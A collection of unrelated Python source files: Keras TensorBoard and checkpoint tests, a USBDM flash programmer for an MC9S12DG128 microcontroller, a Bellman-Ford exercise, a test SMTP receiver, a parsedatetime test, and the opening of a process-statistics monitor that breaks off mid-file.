_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/uve/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, dirnames, filenames) in os.walk(self.logdir):
del dirnames # unused
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
class MostRecentlyModifiedFileMatchingPatternTest(test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there are some intervals between file creation.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
checkpoint_management.update_checkpoint_state_internal(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
if __name__ == '__main__':
test.main()
|
mc9s12dg128.py | from helpers import *
from usbdm import*
from chips.chipinterface import ChipInterface
import threading
from queue import Queue
# Note: DJ64-Flash can only write word-length
# Chip standard Clock is 8Mhz
class MC9S12DG128(ChipInterface):
NAME = "MC9S12DG128"
ADDRESS_MAPPED_PAGE = 0x8000
ADDRESS_PROTECTION_FLASH0 = 0xFF0D
ADDRESS_PROTECTION_FLASH1 = 0xFF0E
ADDRESS_SECURITY_FLASH = 0xFF0F
RAM_START = 0x4000
RAM_END = 0x5000
PAGE_LENGTH = 0x4000
VALUE_SECURITY_UNSECURE = 0xFFFE
VALUE_SECURITY_SECURE = 0xFFFF
REG_PAGE_MAP= 0x00000030
REG_FCLKDIV = 0x00000100
REG_FSEC = 0x00000101
REG_FCNFG = 0x00000103
REG_FPROT = 0x00000104
REG_FSTAT = 0x00000105
REG_FCMD = 0x00000106
REG_MODE = 0x0000000B
REG_INITRM = 0x00000010
REG_INITRG = 0x00000011
REG_INITEE = 0x00000012
REG_ECLKDIV = 0x00000110
REG_ECNFG = 0x00000113
REG_EPROT = 0x00000114
REG_ESTAT = 0x00000115
REG_ECMD = 0x00000116
BITS_FSTAT_ACCER = 0x10
BITS_FSTAT_PVIOL = 0x20 # protection violation
BITS_FSTAT_CCIF = 0x40
BITS_FSTAT_CBEIF = 0x80
BITS_FSTAT_RESET = 0xFF
BITS_FSTAT_BLANK = 0x04
BITS_ESTAT_ACCER = BITS_FSTAT_ACCER
BITS_ESTAT_PVIOL = BITS_FSTAT_PVIOL
BITS_ESTAT_CCIF = BITS_FSTAT_CCIF
BITS_ESTAT_CBEIF = BITS_FSTAT_CBEIF
BITS_ESTAT_RESET = BITS_FSTAT_RESET
BITS_ESTAT_BLANK = BITS_FSTAT_BLANK
BITS_CNFG_BLKSEL = 0x01
CMD_BLANK = 0x05
CMD_PROGRAM = 0x20
CMD_ERASE_SECTOR = 0x40
CMD_ERASE_PAGE = 0x41
def __init__(self,usbdm):
ChipInterface.__init__(self, usbdm, {0x38:[0x388000,0x38BFFF], 0x39:[0x398000,0x39BFFF], 0x3A:[0x3A8000,0x3ABFFF], 0x3B:[0x3B8000,0x3BBFFF], 0x3E:[0x4000,0x7FFF], 0x3F:[0xC000,0xFFFF], 0x3C:[0x3C8000,0x3CBFFF], 0x3D:[0x3D8000,0x3DBFFF]}, 0x1A, [0x0111, 0x0112, 0x0113, 0x0114, 0x0115])
# Note: postbytes X=0x00 Y=0x40 SP= 0x80
# D = counter X = source Y = destination S = value16
# VAR16_DESTINATION #-6 dest
# VAR16_TO_FLASH #-4 size
# VAR16_FLASHED #-2 flashed
# \xce\x40\x60\ #+3 ldx # load source 4060
# \xfd\x40\x00\ #+6 ldy # load destination
# \xcc\x00\x00 #+9 ldd 0
# \xef\x00 #+11 lds D, X
# \x6f\x40 #+13 sts D, Y
# \x18\x0b\x20\x01\x06 #+18 movb #20, $0x106
# \x18\x0b\x80\x01\x05 #+23 movb #80, $0x105
# \1f\x01\x05\x40\xfb #+28 loop if CBIF clear in %105
# \xc3\x00\x02 #+31 addd 2
# \x08\x08\x02\x02 #+35 inx 2 iny 2
# \xbc\x40\x02 #+38 cmp D $4002
# \x26\xe1 #+40 bne to start
# \x7c\x40\x04 #+43 std $4002
# \x2a\xfe" #+45 loop
self.bootloader = [b"\xce\x40\x60",\
b"\xfd\x40\x00",\
b"\xcc\x00\x00",\
b"\xef\x00",\
b"\x6f\x40",\
b"\x18\x0b\x20\x01\x06",\
b"\x18\x0b\x80\x01\x05",\
b"\x1f\x01\x05\x40\xfb",\
b"\xc3\x00\x02",\
b"\x08\x08\x02\x02",\
b"\xbc\x40\x02",\
b"\x26\xe1",\
b"\x7c\x40\x04",\
b"\x2a\xfe"]
def unsecure(self):
log("Unsecuring chip by erasing protection configuration",level=LOGL_NORMAL,tag = self.NAME)
self.setup()
log("Erasing EEPROM",level=LOGL_VERBOSE,tag = self.NAME)
self.usbdm.writeBdmWord(0x118,0x7ff0) #EADDR HI
self.usbdm.writeBdmWord(0x11a,0xffff) #EDATA HI
self.usbdm.writeBdmByte(MC9S12DG128.REG_ECMD, MC9S12DG128.CMD_ERASE_PAGE)
self.usbdm.writeBdmByte(MC9S12DG128.REG_ESTAT, MC9S12DG128.BITS_ESTAT_CBEIF)
self.waitForEEPROM()
# write 115 30
# write 115 02
# write 118 7ff0
# write 11a ffff
# write 116 41
# write 115 80
#
log("Erasing Flash",level=LOGL_VERBOSE,tag = self.NAME)
self.usbdm.writeBdmWord(0x108,0x7ff0) #EADDR HI
self.usbdm.writeBdmWord(0x10a,0xffff) #EDATA HI
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCMD, MC9S12DG128.CMD_ERASE_PAGE)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, MC9S12DG128.BITS_FSTAT_CBEIF)
self.waitForFlash()
# write 105 30
# write 102 00
# write 105 02
# write 102 10
# write 108 7ff0
# write 10a ffff
# write 106 41
# write 105 80
# self.reset()
def setup(self):
log("Setting up registers and flash access",level=LOGL_NORMAL,tag = self.NAME)
self.usbdm.writeBdmByte(MC9S12DG128.REG_MODE, 0xe0) # Single mode
self.usbdm.writeBdmByte(0x3C, 0x40) # Stop watchdog
self.usbdm.writeBdmByte(MC9S12DG128.REG_INITRM, 0x40) # map the ram at 0x4000
#self.usbdm.writeBdmByte(MC9S12DG128.REG_INITRG, 0x18) # Map registers to 0x1800 - 0x1FFF ?
#Misc
self.usbdm.writeBdmByte(0x13, 0x03)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, 0x00)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FPROT, 0xFF)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCLKDIV, 0x2A)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, 0xFF) # Reset FSTAT
log("Setting up EEPROM",level=LOGL_VERBOSE,tag = self.NAME)
self.usbdm.writeBdmByte(MC9S12DG128.REG_ECLKDIV, 0x2A) # ECLK
self.usbdm.writeBdmByte(MC9S12DG128.REG_ESTAT, 0xff) # EPROT
self.usbdm.writeBdmByte(MC9S12DG128.REG_INITEE, 0x01) # Enable EEPROM
# Need to connect to program
def program(self):
start = time.time()
if self.memory.gettotalbytes()>0:
# if can't connect, then we need to unsecure the flash by erasing it's contents
retries = 0
while retries <=3:
if retries >= 3:
raise ValueError("Error: Could not prepare flash for programming")
elif self.connect():
self.unsecure()
self.erase()
retries +=1
elif self.blankcheck():
self.unsecure()
self.erase()
retries +=1
else:
self.flash()
self.verify()
break
log("time: %s s"%str(time.time()-start), level=LOGL_NORMAL,tag = self.NAME)
# Flash
def flash(self):
log("Loading bootloader into RAM",level=LOGL_VERBOSE,tag = self.NAME)
self.halt()
self.writememory(MC9S12DG128.RAM_START+6, b"".join(self.bootloader))
pagenumbers = list(self.ChipPages.keys()) # are the keys
for pageaddress in pagenumbers:
if len(self.memorypages[pageaddress]) == 0:
log("Skipping Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
else:
log("Flashing Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
pagestart = self.ChipPages[pageaddress][0]
pageend = self.ChipPages[pageaddress][1]
# Select Flash: 0 or 1
if pageaddress<0x3C:
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, MC9S12DG128.BITS_CNFG_BLKSEL)
else:
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG,0x00)
self.usbdm.writeBdmByte(MC9S12DG128.REG_PAGE_MAP, pageaddress)
# Flash segments for current page
for segment in self.memorypages[pageaddress]:
written = 0
dataleft = segment.getlength()
memorystart = segment.address-pagestart
maxspace = MC9S12DG128.RAM_END - (MC9S12DG128.RAM_START+0x60) # minus the size of the bootloader + some bytes
offset = segment
# Write in small batches, because ram is only 1k
while dataleft > 0:
sztowrite = 0
if dataleft>maxspace:
sztowrite = maxspace
else:
sztowrite = dataleft
log("Flashing %d Bytes, Address: %x "%(sztowrite,MC9S12DG128.ADDRESS_MAPPED_PAGE + memorystart + written), level=LOGL_VERBOSE,tag = self.NAME)
self.writememory(MC9S12DG128.RAM_START+0x60,segment.data[written:written+sztowrite])
fcondition = sztowrite.to_bytes(2,"big")
self.usbdm.writeBdmWord(MC9S12DG128.RAM_START, MC9S12DG128.ADDRESS_MAPPED_PAGE + memorystart + written)
self.usbdm.writeBdmWord(MC9S12DG128.RAM_START+2, fcondition)
self.usbdm.writeBdmWord(MC9S12DG128.RAM_START+4, 0)
log("Executing bootloader ", level=LOGL_VERBOSE,tag = self.NAME)
self.usbdm.writeRegister(0x03, MC9S12DG128.RAM_START+6) # set PC Counter
self.usbdm.runTarget() # execute boot loader
timeout = time.time() * 1000 + 5000
while True:
if time.time()*1000<timeout:
mem = self.usbdm.readBdmBlock(MC9S12DG128.RAM_START+4,2)
#self.readmemory(0x4000, 50)
if bytes(mem[1:]) == fcondition:
break
else:
raise ValueError("Error: flashing timed out")
log("Halting bootloader ", level=LOGL_VERBOSE,tag = self.NAME)
self.usbdm.haltTarget()
written = written + sztowrite
dataleft = dataleft - sztowrite
def erase(self):
for pageaddress in self.ChipPages:
log("Erasing Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
# Select Flash: 0 or 1
if pageaddress<0x3C:
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, MC9S12DG128.BITS_CNFG_BLKSEL)
else:
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG,0x00)
self.usbdm.writeBdmByte(MC9S12DG128.REG_PAGE_MAP, pageaddress)
self.usbdm.writeBdmWord(MC9S12DG128.ADDRESS_MAPPED_PAGE, 0xFFFF) #
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCMD, MC9S12DG128.CMD_ERASE_PAGE)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, MC9S12DG128.BITS_FSTAT_CBEIF)
self.waitForFlash()
def blankcheck(self):
status = 0
log("Blank check ",level=LOGL_VERBOSE,tag = self.NAME)
self.usbdm.writeBdmWord(MC9S12DG128.ADDRESS_MAPPED_PAGE, 0xFFFF) #
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCMD, MC9S12DG128.CMD_BLANK)
self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, MC9S12DG128.BITS_FSTAT_CBEIF)
readstatus = self.waitForFlash()
if readstatus & MC9S12DG128.BITS_FSTAT_BLANK == MC9S12DG128.BITS_FSTAT_BLANK:
log("Device is blank",level=LOGL_NORMAL,tag = self.NAME)
else:
status = 1
log("Device is not blank",level=LOGL_NORMAL,tag = self.NAME)
return status
def verify(self):
threads = []
errorQueue = Queue()
for pageaddress in list(self.ChipPages.keys()):
log("Verifying Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
# Select Flash: 0 or 1
if pageaddress<0x3C:
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, MC9S12DG128.BITS_CNFG_BLKSEL)
else:
self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG,0x00)
self.usbdm.writeBdmByte(MC9S12DG128.REG_PAGE_MAP, pageaddress)
flashmemory = self.readmemory(MC9S12DG128.ADDRESS_MAPPED_PAGE, MC9S12DG128.PAGE_LENGTH)
# compare memory
thread = threading.Thread(target=comparepagetosegments, args=(self.memorypages[pageaddress],flashmemory,self.ChipPages[pageaddress][0],self.ChipPages[pageaddress][1],errorQueue,))
threads.append(thread)
thread.start()
# Wait for threads to finish
for t in threads:
t.join()
if not errorQueue.empty():
while not errorQueue.empty():
result = errorQueue.get()
log("Memory did not match at %10X expected: %2s read: %2s"%(result[0], result[1], result[2]),level=LOGL_VERBOSE,tag = self.NAME)
raise ValueError("Error: Contents don't match the file")
else:
log("Verified. Contents are good",level=LOGL_NORMAL,tag = self.NAME)
def waitForEEPROM(self):
timeout = time.time()*1000 + 5000 # 5 seconds
readstatus = 0x00
while True:
if time.time()*1000<timeout:
time.sleep(0.010)
readstatus = self.usbdm.readBdmByte(MC9S12DG128.REG_ESTAT)[1]
if readstatus & MC9S12DG128.BITS_ESTAT_ACCER == MC9S12DG128.BITS_ESTAT_ACCER:
raise ValueError("Error: couldn't access EEPROM")
elif readstatus & MC9S12DG128.BITS_ESTAT_PVIOL == MC9S12DG128.BITS_ESTAT_PVIOL:
raise ValueError("Error: protection violation EEPROM")
elif readstatus & MC9S12DG128.BITS_ESTAT_CCIF == MC9S12DG128.BITS_ESTAT_CCIF:
break
else:
raise ValueError("Error: command timed out")
return readstatus
def waitForFlash(self):
timeout = time.time()*1000 + 5000 # 5 seconds
readstatus = 0x00
while True:
if time.time()*1000<timeout:
time.sleep(0.010)
readstatus = self.usbdm.readBdmByte(MC9S12DG128.REG_FSTAT)[1]
if readstatus & MC9S12DG128.BITS_FSTAT_ACCER == MC9S12DG128.BITS_FSTAT_ACCER:
raise ValueError("Error: couldn't access flash")
elif readstatus & MC9S12DG128.BITS_FSTAT_PVIOL == MC9S12DG128.BITS_FSTAT_PVIOL:
raise ValueError("Error: protection violation flash")
elif readstatus & MC9S12DG128.BITS_FSTAT_CCIF == MC9S12DG128.BITS_FSTAT_CCIF:
break
else:
raise ValueError("Error: command timed out")
return readstatus
|
lab11_d.py | from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main():
inf = 10 ** 15 + 1
#Ford-Bellman algo
def get_marked(vertex):
marked[vertex] = 1
for current_vertex in matrix[vertex]:
if not marked[current_vertex]: get_marked(current_vertex)
file_input, file_output = open('path.in', 'r'), open('path.out','w')
n, m, s = map(int, file_input.readline().split())
weight_map, bad_weights, matrix, marked = [inf] * n, [], [[] for _ in range(n)], [0] * n
weight_map[s - 1] = 0
all_data = []
for _ in range(m):
current = list(map(int, file_input.readline().split()))
matrix[current[0] - 1].append(current[1] - 1)
all_data.append([current[0] - 1, current[1] - 1, current[2]])
for _ in range(n + 1):
bad_weights = []
flag = None
for i in range(m):
current = all_data[i]
if weight_map[current[0]] != inf:
if weight_map[current[1]] > weight_map[current[0]] + current[2]:
weight_map[current[1]] = weight_map[current[0]] + current[2]
flag = current[1]
bad_weights.append(current[1])
if flag is None: break
if flag:
for vertex1 in bad_weights:
if not marked[vertex1]: get_marked(vertex1)
for j in range(n):
if marked[j]: weight_map[j] = '-'
for weight in weight_map:
if weight != inf: print(weight, file=file_output)
else: print('*', file=file_output)
file_output.close()
thread = threading.Thread(target=main)
thread.start() |
receiver.py | #!/usr/bin/env python
import sys
import asyncore
import email
import smtpd
import time
from threading import Thread
DEBUG = True
class CustomSMTPServer(smtpd.SMTPServer):
num = 0
def process_message(self, peer, mailfrom, recvtos, data):
msg = email.message_from_string(data).get_payload().strip()
self.num += 1
if DEBUG:
print >>sys.stderr, "DEBUG: Received message {0}".format(msg)
def get_num(self):
return self.num
class Receiver(object):
def __init__(self, host, port):
self.host = host
self.port = port
def start(self):
self.smtp = CustomSMTPServer((self.host, self.port), None)
self.thread = Thread(target = asyncore.loop, kwargs = {'timeout': 1})
self.thread.daemon = True
self.thread.start()
def status(self):
return "running" if self.thread.is_alive() else "stopped"
def stop(self):
self.smtp.close()
self.thread.join()
def get_received(self):
return str(self.smtp.get_num())
if __name__ == "__main__":
recv = Receiver("0.0.0.0", 2255)
recv.start()
print "HELLO - going to sleep but can receive messages"
time.sleep(30)
print "All done"
recv.stop()
|
TestContext.py | # -*- coding: utf-8 -*-
"""
Test pdtContext
"""
import time
import unittest
import parsedatetime as pdt
from parsedatetime.context import pdtContext
class test(unittest.TestCase):
def setUp(self):
self.cal = pdt.Calendar(version=pdt.VERSION_CONTEXT_STYLE)
(self.yr, self.mth, self.dy, self.hr, self.mn,
self.sec, self.wd, self.yd, self.isdst) = time.localtime()
def testContext(self):
self.assertEqual(self.cal.parse('5 min from now')[1],
pdtContext(pdtContext.ACU_MIN | pdtContext.ACU_NOW))
self.assertEqual(self.cal.parse('5 min from now',
version=pdt.VERSION_FLAG_STYLE)[1], 2)
self.assertEqual(self.cal.parse('7/11/2015')[1],
pdtContext(pdtContext.ACU_YEAR |
pdtContext.ACU_MONTH | pdtContext.ACU_DAY))
self.assertEqual(self.cal.parse('7/11/2015',
version=pdt.VERSION_FLAG_STYLE)[1], 1)
self.assertEqual(self.cal.parse('14/32/2015')[1],
pdtContext(0))
self.assertEqual(self.cal.parse('25:23')[1],
pdtContext())
def testSources(self):
self.assertEqual(self.cal.parse('afternoon 5pm')[1],
pdtContext(pdtContext.ACU_HALFDAY |
pdtContext.ACU_HOUR))
self.assertEqual(self.cal.parse('morning')[1],
pdtContext(pdtContext.ACU_HALFDAY))
self.assertEqual(self.cal.parse('night', version=1)[1], 2)
def testThreadRun(self):
from threading import Thread
t = Thread(target=lambda: self.cal.evalRanges('4p-6p'))
# should not throw out AttributeError
t.start()
if __name__ == "__main__":
unittest.main()
|
watch_proc_stats.py | #!/usr/bin/python3
"""
File: watch_proc_stats.py
Description: Monitors searches for processes with names containing a \
given string and monitors those processes statistics continuously
"""
# pylint: disable=C0325,R0902,R0903,E1101,F0401
# import os
import sys
import time
import logging
import threading
import subprocess
import psutil
import datetime
import queue
import dataset
import datafreeze
LOGGER_NAME = "ProcessesMonitor"
HELP_ARGS_NUMBER = 2
EXPORT_ARGS_NUMBER = 2
MIN_ARGS_COUNT = 2
MAX_ARGS_COUNT = 3
POLL_TIME_ARG_LOCATION = 3
DEFAULT_POLL_TIME = 5
DATABASE_LOCATION = "sqlite:///processes_statistics.db?check_same_thread=False"
class DataExporter(object):
"""Exporting all the data from the tables to csv"""
def __init__(self, db_location_uri):
"""
:db_location_uri: Location of the database
"""
self.logger = logging.getLogger(LOGGER_NAME)
self.db_location_uri = db_location_uri
def export(self):
"""
Exporting the data in the database
"""
database_connection = dataset.connect(self.db_location_uri)
for table_name in database_connection.tables:
file_name = table_name + ".csv"
file_name = file_name.replace("/", "_")
self.logger.debug("About to export filename %s", file_name)
result = database_connection[table_name].all()
datafreeze.freeze(result, format="csv", filename=file_name)
class DatabaseManager(object):
"""Handles instance of database connection and synchronizes writes to database"""
def __init__(self, db_location_uri):
"""
Initialization function
:db_location_uri: Location of the database
"""
self.logger = logging.getLogger(LOGGER_NAME)
self.db_location_uri = db_location_uri
self.database_connection = None
self.stored_thread_id = None
self.consumer_thread = None
self.lock = threading.Lock()
self.queue = queue.Queue()
def consumer_loop(self):
"""
Continuously consumes data from the queue and stores it
"""
self.logger.debug("Starting consumer")
self.validate_connection()
data = self.queue.get()
while data:
table_name = data[0]
data_item = data[1]
table = self.database_connection[table_name]
table.insert(data_item)
data = self.queue.get()
self.disconnect()
self.logger.debug("Consumer thread about to stop id:%s", threading.get_ident())
self.logger.debug("Stopping consumer")
def insert_to_db(self, table_name, data_item):
"""
Inserts data to a table
:table_name: Name of the table to insert data to
